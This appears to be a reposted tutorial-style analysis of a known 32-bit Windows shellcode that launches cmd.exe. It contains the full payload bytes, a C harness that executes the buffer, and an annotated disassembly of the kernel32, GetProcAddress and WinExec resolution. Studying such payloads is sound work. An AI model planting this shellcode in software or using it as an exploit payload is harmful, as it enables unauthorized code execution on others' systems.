一个32位的打开cmd的ShellCode

转载自
http://shell-storm.org/shellcode/files/shellcode-662.php

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
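/*
 * Minimal harness for the 32-bit Windows payload above: it prints the
 * payload length, waits for a keypress and then jumps into the buffer.
 *
 * Reading notes:
 *  - The buffer is ordinary stack data.  On a host that enforces
 *    DEP/NX the indirect call below faults instead of running the
 *    bytes; that fault is the expected (defensive) outcome, not a
 *    harness bug.
 *  - Windows-only: system("PAUSE") is a cmd.exe builtin, and the
 *    payload itself locates kernel32 through fs:[0x30] (the PEB), so
 *    it has no meaning elsewhere.
 *  - strlen() stops at the first NUL byte; the printed size is only
 *    correct because this particular payload contains no 0x00.
 *
 * Returns 0, although the payload normally terminates the process
 * (it ends in ExitProcess) before the return is reached.
 */
int main(void)
{
    unsigned char shellcode[] =
    "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
    "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
    "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
    "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
    "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
    "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
    "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
    "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
    "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
    "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
    "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
    "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
    "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE"
    "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53"
    "\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24"
    "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51"
    "\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE"
    "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45"
    "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54"
    "\x24\x20\x57\xFF\xD0";

    /* strlen() returns size_t, so %zu (the original's %d is a
     * format/argument type mismatch, i.e. undefined behaviour) and
     * the unsigned char array needs an explicit char* cast. */
    printf("Size = %zu\n", strlen((const char *)shellcode));
    system("PAUSE");

    /* Treat the data buffer as a function and call it. */
    ((void (*)(void))shellcode)();
    return 0;
}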

对这个shellcode的分析

/*
 * Annotated disassembly of the payload.  Stage 1 (cld .. jne -26h) walks
 * the PEB loader list and hashes module names until it finds kernel32.
 * Stage 2 (mov edx,[ebx+3Ch] .. add edx,ebx) parses kernel32's export
 * table by hand to find GetProcAddress.  Stage 3 builds "WinExec",
 * "cmd" and "ExitProcess" on the stack and calls WinExec("cmd", 5)
 * followed by ExitProcess.  Offsets are the 32-bit (x86) layouts.
 */
const char *shellcode = 
"\xFC"                         // cld                           ; DF=0 so lods/loop walk forward
"\x33\xD2"                     // xor  edx, edx
"\xB2\x30"                     // mov   dl, 30h                 ; fs: selects the TEB;
                               //                               ; TEB+30h holds the PEB pointer
"\x64\xFF\x32"                 // push dword ptr fs:[edx]       ; push PEB address
"\x5A"                         // pop  edx                      ; edx = PEB
"\x8B\x52\x0C"                 // mov  edx, dword ptr [edx+0Ch] ; edx = PEB.Ldr (PEB_LDR_DATA)
"\x8B\x52\x14"                 // mov  edx, dword ptr [edx+14h] ; edx = first InMemoryOrderModuleList entry
"\x8B\x72\x28"                 // mov  esi, dword ptr [edx+28h] ; esi = this module's name buffer (UTF-16).
                               //                               ; The original note says FullDllName; the 18h-byte
                               //                               ; loop below matches the 12 wide chars of
                               //                               ; "KERNEL32.DLL", so this looks like BaseDllName
                               //                               ; -- NOTE(review): confirm against the entry layout
"\x33\xC9"                     // xor  ecx, ecx
"\xB1\x18"                     // mov   cl, 18h                 ; hash 18h bytes = 12 UTF-16 characters
"\x33\xFF"                     // xor  edi, edi                 ; edi = running hash
"\x33\xC0"                     // xor  eax, eax
"\xAC"                         // lods byte ptr [esi]           ; al = next byte of the name
"\x3C\x61"                     // cmp   al, 61h
"\x7C\x02"                     // jl   +2h                      ; bytes below 'a' skip the fold
"\x2C\x20"                     // sub   al, 20h                 ; lower -> upper: case-insensitive hash
"\xC1\xCF\x0D"                 // ror  edi, 0Dh                 ; hash = ror13(hash) + byte
"\x03\xF8"                     // add  edi, eax
"\xE2\xF0"                     // loop -10h                     ; back to lods until cl bytes are done
"\x81\xFF\x5B\xBC\x4A\x6A"     // cmp  edi, 6A4ABC5Bh           ; ror13 hash of "KERNEL32.DLL"
"\x8B\x5A\x10"                 // mov  ebx, dword ptr [edx+10h] ; ebx = this entry's DllBase
"\x8B\x12"                     // mov  edx, dword ptr [edx]     ; edx = next list entry (Flink)
"\x75\xDA"                     // jne  -26h                     ; not kernel32 yet: hash the next module
"\x8B\x53\x3C"                 // mov  edx, dword ptr [ebx+3Ch] ; e_lfanew
"\x03\xD3"                     // add  edx, ebx                 ; edx = kernel32 IMAGE_NT_HEADERS
"\xFF\x72\x34"                 // push dword ptr [edx+34h]      ; push OptionalHeader.ImageBase; read back
                               //                               ; as [esp+20h] near the end
"\x8B\x52\x78"                 // mov  edx, dword ptr [edx+78h] ; export table RVA (DataDirectory[0])
"\x03\xD3"                     // add  edx, ebx                 ; edx = IMAGE_EXPORT_DIRECTORY
"\x8B\x72\x20"                 // mov  esi, dword ptr [edx+20h] ; AddressOfNames RVA
"\x03\xF3"                     // add  esi, ebx                 ; esi = export name-pointer table
"\x33\xC9"                     // xor  ecx, ecx                 ; ecx = name index (pre-incremented)
"\x41"                         // inc  ecx
"\xAD"                         // lods dword ptr [esi]          ; eax = RVA of the next export name
"\x03\xC3"                     // add  eax, ebx
"\x81\x38\x47\x65\x74\x50"     // cmp  dword ptr   [eax], 50746547h ; "GetP"
"\x75\xF4"                     // jne  -0ch
"\x81\x78\x04\x72\x6F\x63\x41" // cmp  dword ptr [eax+4], 41636F72h ; "rocA"
"\x75\xEB"                     // jne  -15h
"\x81\x78\x08\x64\x64\x72\x65" // cmp  dword ptr [eax+8], 65726464h ; "ddre" -> matched "GetProcAddress"
"\x75\xE2"                     // jne  -1eh
"\x49"                         // dec  ecx                      ; ecx = 0-based index of that name
"\x8B\x72\x24"                 // mov  esi, dword ptr [edx+24h] ; AddressOfNameOrdinals RVA
"\x03\xF3"                     // add  esi, ebx
"\x66\x8B\x0C\x4E"             // mov   cx, word ptr [esi+ecx*2] ; cx = ordinal of GetProcAddress
"\x8B\x72\x1C"                 // mov  esi, dword ptr [edx+1Ch] ; AddressOfFunctions RVA
"\x03\xF3"                     // add  esi, ebx
"\x8B\x14\x8E"                 // mov  edx, dword ptr [esi+ecx*4] ; function RVA
"\x03\xD3"                     // add  edx, ebx                 ; edx = GetProcAddress
"\x52"                         // push edx                      ; saved copy; read back as [esp+20h] later
"\x68\x78\x65\x63\x01"         // push 01636578h                ; "xec\x01"
"\xFE\x4C\x24\x03"             // dec  byte ptr [esp+3]         ; -> "xec\0"
"\x68\x57\x69\x6E\x45"         // push 456E6957h                ; "WinE": stack now reads "WinExec\0"
"\x54"                         // push esp                      ; lpProcName
"\x53"                         // push ebx                      ; hModule = kernel32 base
"\xFF\xD2"                     // call edx                      ; eax = GetProcAddress(kernel32, "WinExec")
"\x68\x63\x6D\x64\x01"         // push 01646D63h                ; "cmd\x01"
"\xFE\x4C\x24\x03"             // dec  byte ptr [esp+3]         ; -> "cmd\0"
"\x6A\x05"                     // push 5                        ; uCmdShow = 5 (SW_SHOW)
"\x33\xC9"                     // xor  ecx, ecx
"\x8D\x4C\x24\x04"             // lea  ecx, [esp+4]                 ; lpCmdLine -> "cmd"
"\x51"                         // push ecx
"\xFF\xD0"                     // call eax                          ; WinExec("cmd", 5) -- cmd is launched here
"\x68\x65\x73\x73\x01"         // push 01737365h                ; "ess\x01"
"\x8B\xDF"                     // mov  ebx, edi                 ; edi still holds the kernel32 hash;
                               //                               ; ebx is not read again after this
"\xFE\x4C\x24\x03"             // dec  byte ptr [esp+3]         ; -> "ess\0"
"\x68\x50\x72\x6F\x63"         // push 636F7250h                ; "Proc"
"\x68\x45\x78\x69\x74"         // push 74697845h                ; "Exit": stack now reads "ExitProcess\0"
"\x54"                         // push esp                      ; lpProcName
"\xFF\x74\x24\x20"             // push dword ptr [esp+20h]      ; hModule = the ImageBase pushed earlier
                               //                               ; (header value, not the ebx DllBase)
"\xFF\x54\x24\x20"             // call dword ptr [esp+20h]           ; eax = GetProcAddress(kernel32, "ExitProcess")
"\x57"                         // push edi                           ; uExitCode = whatever edi holds (the hash)
"\xFF\xD0"                     // call eax                           ; ExitProcess(...) terminates the host
;